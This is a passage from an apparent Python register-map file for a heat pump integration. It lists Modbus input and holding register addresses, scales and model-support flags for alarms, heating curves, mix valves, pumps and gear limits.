{ KEY_ADDRESS: 161, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_CLASS_A_ALARM_DETECTED_ON_THE_GENESIS_SECONDARY:
{ KEY_ADDRESS: 162, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_CLASS_B_ALARM_DETECTED_ON_THE_GENESIS_SECONDARY:
{ KEY_ADDRESS: 163, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_COMBINED_OUTPUT_OF_ALL_CLASS_E_ALARMS:
{ KEY_ADDRESS: 170, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_GENERAL_LEGACY_HEAT_PUMP_ALARM:
{ KEY_ADDRESS: 171, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_PRIMARY_UNIT_CAN_NOT_COMMUNICATE_WITH_EXPANSION:
{ KEY_ADDRESS: 173, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_OPERATIONAL_MODE:
{ KEY_ADDRESS: 0, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAX_LIMITATION:
{ KEY_ADDRESS: 3, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIN_LIMITATION:
{ KEY_ADDRESS: 4, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_COMFORT_WHEEL_SETTING:
{ KEY_ADDRESS: 5, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_1:
{ KEY_ADDRESS: 6, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_2:
{ KEY_ADDRESS: 7, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_3:
{ KEY_ADDRESS: 8, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_4:
{ KEY_ADDRESS: 9, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_5:
{ KEY_ADDRESS: 10, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_6:
{ KEY_ADDRESS: 11, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_7:
{ KEY_ADDRESS: 12, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_HEATING_SEASON_STOP_TEMPERATURE:
{ KEY_ADDRESS: 16, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_START_TEMPERATURE_TAP_WATER:
{ KEY_ADDRESS: 22, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_STOP_TEMPERATURE_TAP_WATER:
{ KEY_ADDRESS: 23, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_HEATING:
{ KEY_ADDRESS: 26, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_HEATING:
{ KEY_ADDRESS: 27, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_TAP_WATER:
{ KEY_ADDRESS: 28, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_TAP_WATER:
{ KEY_ADDRESS: 29, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_COOLING_MIX_VALVE_SET_POINT:
{ KEY_ADDRESS: 30, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_TWC_MIX_VALVE_SET_POINT:
{ KEY_ADDRESS: 31, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_WCS_RETURN_LINE_SET_POINT:
{ KEY_ADDRESS: 32, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_TWC_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 33, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_TWC_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 34, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_TWC_START_TEMPERATURE_IMMERSION_HEATER:
{ KEY_ADDRESS: 35, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_TWC_START_DELAY_IMMERSION_HEATER:
{ KEY_ADDRESS: 36, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_TWC_STOP_TEMPERATURE_IMMERSION_HEATER:
{ KEY_ADDRESS: 37, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_WCS_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 38, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_WCS_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 39, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_MIX_VALVE_2_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 40, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_2_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 41, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_3_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 42, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_3_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 43, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_4_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 44, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_4_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 45, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_5_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 46, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_5_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 47, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SURPLUS_HEAT_CHILLER_SET_POINT:
{ KEY_ADDRESS: 48, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_COOLING_SUPPLY_LINE_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 49, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_COOLING_SUPPLY_LINE_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 50, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STARTING_FAN_1:
{ KEY_ADDRESS: 51, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STARTING_FAN_2:
{ KEY_ADDRESS: 52, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STOPPING_FAN_1:
{ KEY_ADDRESS: 53, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STOPPING_FAN_2:
{ KEY_ADDRESS: 54, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SURPLUS_HEAT_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 55, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SURPLUS_HEAT_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 56, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_POOL_CHARGE_SET_POINT:
{ KEY_ADDRESS: 58, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_POOL_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 59, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_POOL_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 60, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_GEAR_SHIFT_DELAY_HEATING:
{ KEY_ADDRESS: 61, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_GEAR_SHIFT_DELAY_POOL:
{ KEY_ADDRESS: 62, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_GEAR_SHIFT_DELAY_COOLING:
{ KEY_ADDRESS: 63, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_IN_HIGH_ALARM_LIMIT:
{ KEY_ADDRESS: 67, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_IN_LOW_ALARM_LIMIT:
{ KEY_ADDRESS: 68, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_OUT_LOW_ALARM_LIMIT:
{ KEY_ADDRESS: 69, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_MAX_DELTA_LIMIT:
{ KEY_ADDRESS: 70, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_HOT_GAS_PUMP_START_TEMPERATURE_DISCHARGE_PIPE:
{ KEY_ADDRESS: 71, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_HOT_GAS_PUMP_LOWER_STOP_LIMIT_TEMPERATURE_DISCHARGE_PIPE:
{ KEY_ADDRESS: 72, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_HOT_GAS_PUMP_UPPER_STOP_LIMIT_TEMPERATURE_DISCHARGE_PIPE:
{ KEY_ADDRESS: 73, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_EXTERNAL_ADDITIONAL_HEATER_START:
{ KEY_ADDRESS: 75, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_CONDENSER_PUMP_LOWEST_ALLOWED_SPEED:
{ KEY_ADDRESS: 76, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_PUMP_LOWEST_ALLOWED_SPEED:
{ KEY_ADDRESS: 77, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_EXTERNAL_ADDITIONAL_HEATER_STOP:
{ KEY_ADDRESS: 78, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_CONDENSER_PUMP_HIGHEST_ALLOWED_SPEED:
{ KEY_ADDRESS: 79, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_PUMP_HIGHEST_ALLOWED_SPEED:
{ KEY_ADDRESS: 80, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_CONDENSER_PUMP_STANDBY_SPEED:
{ KEY_ADDRESS: 81, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_PUMP_STANDBY_SPEED:
{ KEY_ADDRESS: 82, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_POOL:
{ KEY_ADDRESS: 85, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_POOL:
{ KEY_ADDRESS: 86, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_COOLING:
{ KEY_ADDRESS: 87, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_COOLING:
{ KEY_ADDRESS: 88, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_START_TEMP_FOR_COOLING:
{ KEY_ADDRESS: 105, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_STOP_TEMP_FOR_COOLING:
{ KEY_ADDRESS: 106, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_1:
{ KEY_ADDRESS: 107, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_1:
{ KEY_ADDRESS: 108, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_1:
{ KEY_ADDRESS: 109, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_1:
{ KEY_ADDRESS: 110, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_1:
{ KEY_ADDRESS: 111, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_1:
{ KEY_ADDRESS: 112, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_1:
{ KEY_ADDRESS: 113, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_1:
{ KEY_ADDRESS: 114, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_1:
{ KEY_ADDRESS: 115, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_FIXED_SYSTEM_SUPPLY_SET_POINT:
{ KEY_ADDRESS: 116, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_2:
{ KEY_ADDRESS: 199, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_2:
{ KEY_ADDRESS: 200, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_2:
{ KEY_ADDRESS: 201, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_2:
{ KEY_ADDRESS: 202, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_2:
{ KEY_ADDRESS: 203, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_2:
{ KEY_ADDRESS: 204, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_2:
{ KEY_ADDRESS: 205, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_2:
{ KEY_ADDRESS: 206, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_2:
{ KEY_ADDRESS: 207, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_3:
{ KEY_ADDRESS: 208, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_3:
{ KEY_ADDRESS: 209, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_3:
{ KEY_ADDRESS: 210, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_3:
{ KEY_ADDRESS: 211, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_3:
{ KEY_ADDRESS: 212, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_3:
{ KEY_ADDRESS: 213, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_3:
{ KEY_ADDRESS: 214, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_3:
{ KEY_ADDRESS: 215, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_3:
{ KEY_ADDRESS: 216, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_4:
{ KEY_ADDRESS: 239, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_4:
{ KEY_ADDRESS: 240, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_4:
{ KEY_ADDRESS: 241, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
